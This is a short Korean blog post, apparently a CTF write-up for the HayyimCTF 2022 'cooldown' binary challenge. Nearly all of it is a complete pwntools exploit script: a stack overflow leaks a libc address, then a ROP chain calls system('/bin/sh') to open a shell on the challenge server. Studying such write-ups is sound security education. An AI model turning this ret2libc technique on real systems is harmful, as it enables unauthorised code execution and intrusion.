[CTF write up] HayyimCTF 2022 - Cooldown / WarmUp : Tiny Binary Exploitation

[CTF write up] HayyimCTF 2022 - Cooldown / WarmUp : Tiny Binary Exploitation

2022. 2. 14. 23:38ㆍCTF write up

이 문제에 핵심은 소켓 환경에서는 write(0,buf,size) 다음과 같이 출력 함수에 stdin을 인자로 넣어줬을때도 말짱하게 출력된다는 것이다.....

from pwn import *

#p = process(['cooldown'], env={'LD_PRELOAD':'./libc.so.6'})
p = remote("141.164.48.191", 10005)
e = ELF('cooldown')
libc = ELF('libc.so.6')


payload = b'a'*0x38
payload += p64(0x00000000004004A0)

raw_input()
p.send(payload)

lic = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
system_addr = lic - 0x3a2b7a
libc_base =  system_addr - 0x4f550
pop_rdi = libc_base + 0x00000000000215bf
binsh = libc_base + next(libc.search(b'/bin/sh'))

payload = b'a'*0x38
payload += p64(pop_rdi)
payload += p64(binsh)
payload += p64(system_addr)

p.send(payload)

p.interactive()

'CTF write up' 카테고리의 다른 글

[CTF write up] Codegate CTF 2022 Junior - Dino_diary : Simple Out Of Bound (0)	2022.02.27
[CTF write up] Codegate CTF 2022 Junior - cat_tail : Hidden Format String Bug (0)	2022.02.27
[CTF write up] Codegate CTF 2022 Junior - Gift : Rand() Crack (0)	2022.02.27
[CTF write up] HayyimCTF 2022 - MemoryManager : Child VM challenge (0)	2022.02.18
[CTF write up] Zer0pts CTF 2021 - oneshot : 안전하지 않은 반환 값으로 인한 임의의 주소 쓰기(AAW) 취약점 (0)	2022.02.10

Uz.

Uz.

태그

'CTF write up' 카테고리의 다른 글

관련글

티스토리툴바